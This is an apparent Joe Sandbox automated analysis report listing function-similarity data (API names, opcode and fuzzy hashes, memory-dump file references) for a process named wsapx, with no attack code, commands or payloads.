                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                • Instruction ID: 4acc949ff25e1604dcca31a8d6b788e127df6e90745df49047adb14a0e0792da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7316336618B8186DB61DF25F8802AEB3A4FBD4B64F940135EA8D43B54EF3CD546CB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                                • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                • Instruction ID: aaa7dcc27a9280f4d8e29648ee01561f93d4cbd44ea559ef0641044d97f803a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FB1D722B1868242EA62AF61B4401B9E3A1EBD4FF4FC54131ED4D07BC5EE3CE542DB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F1A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D567C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F2B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D561C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F3C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D564C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C71D617C), ref: 00007FF7C71D5F63
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3458911817-0
                                                                                                                                                                                                                                                • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                • Instruction ID: a3afe653c8db7ed585f642b260b6afc0db9432d6872ccb6d41ed810dd9c4eac9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8515432A1864287E721FF25F8C15A9E760BBD8FA4FC44135EA4D47696DF3CE4428B60
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                • Instruction ID: a06605fad0fb532140a1d7121615bf9b8aa18f496d392976e0b8397aaceec27c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B114F36B14B058BEB00DF60F8452A973A4FB59B68F440E35DA5D46764DF3CD1598350
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                                                                                • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                • Instruction ID: e222d40b259723b39d1bf00d4e7d0eb24b594311e539cb882107c992f7882744
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDC1C472B1868687DB259F1AB0846AAF791F7A4B94F848134DF5A43784DF3DE802CB40
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                • API String ID: 0-1127688429
                                                                                                                                                                                                                                                • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                • Instruction ID: 25c89feb67a86c9517ebedacbe162c3504520921d5aec83e3a0c24758c5ff20a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F192A2A083D58BE7A5AF14D488B3EBAE9FF84B50F454538DE4947790CF38E542C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                                                • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                • Instruction ID: 6de5ceb8ad0f2a55dc06da292ca5ca6751057fc281e8a240fc3e6fdcb74a8865
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AB17E73A04B898BEB16DF29D48636C7BA0F784F58F548921DA9D837A4CF39D452CB10
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                                                                                • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                • Instruction ID: b754e0ddf44741f320038ad6d158f5993fdccc199f4383ded995a8952d68c073
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9E1C432A0868683EB68AEA5E05017DB3A0FF85F68F944135DE4E076D4DF29E953C712
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                • API String ID: 0-900081337
                                                                                                                                                                                                                                                • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                • Instruction ID: a30454f43580e9ebd33200ab56684a5bb6f2a276cafcce3056c792ed3446b0cf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE919AB2A182C587E7A59F14E488B3E7AD9FB84760F554139DE4A467D0CF3CE542CB10
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                                                                                • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                • Instruction ID: 6c2f31555495d389edc27585796280867d82c8fc7e0056771376426543c39500
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41517662B186C187E7259E75A801769AB95F7C4FA4F988231CBA847AC5CF3DE04AC710
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                                                                                • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                • Instruction ID: af848be1ad5894f7509a17744cbedf42c132c9c72f8c71b4c65052b67861edec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DA16562A287D547EB25DF69B0017B9BB90ABA0FA4F448032DE8D47785DE3DE502C311
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                • Opcode ID: 206b8dd2323f0c32a07340ca02c5d8af7a3d2d7b1f0478edb605941266a0e502
                                                                                                                                                                                                                                                • Instruction ID: f4bcde2e80cf04e101c6f7a71eaebb69c123bc9c43f56d41b04b55a111b594ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 206b8dd2323f0c32a07340ca02c5d8af7a3d2d7b1f0478edb605941266a0e502
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55519C11B0864243FB65BEA77A9217AD2916FD5FE4FC84134DE0E47B96EE3CE4038221
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                • Instruction ID: 758ffed34e6138c2c25caf028f6af6984ca46bc6a62f3e309a7a73d35564d374
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FB09220E07A82C3EA0A3F217CC221862A57F98B20FD80138C10D40330EE3C21E65B20
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                • Instruction ID: b0a9f5a6fc818377867f10aa1793b43e8c4be1b22c2a5c6e2d347271659eb883
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BD1FA62A086C243EB68AE65A14127DB7A0FB85F68F950235CE0D077D4CF3DD843C762
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                • Instruction ID: 4993fc7ece0f69f6ee79de49a4d691399c6f90a6599f013fd050574a82c27b08
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18C1AD762181E08BD28AEA29E47947A77E0F78930DBD5406BEF8747685CA3CA415DB20
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
